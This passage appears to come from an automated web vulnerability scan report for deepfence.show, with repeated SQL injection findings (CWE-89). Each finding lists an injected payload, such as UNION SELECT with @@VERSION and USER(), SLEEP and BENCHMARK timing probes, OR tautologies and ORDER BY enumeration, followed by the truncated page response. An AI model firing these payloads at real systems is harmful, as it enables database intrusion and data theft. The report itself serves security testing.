\"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1859\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1860\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 3409=3409 AND ('pytW' LIKE '\npytY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1861\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# and (select substring(@@version,1,1))='X'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1862\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# benchmark(50000000,MD5(1))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1863Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 3409=3409 AND ('pytW' LIKE '\npytW\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1864\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1865\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \nNULL#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1866\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1867\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1868\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1869\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1870\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1871\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \") or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1872\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 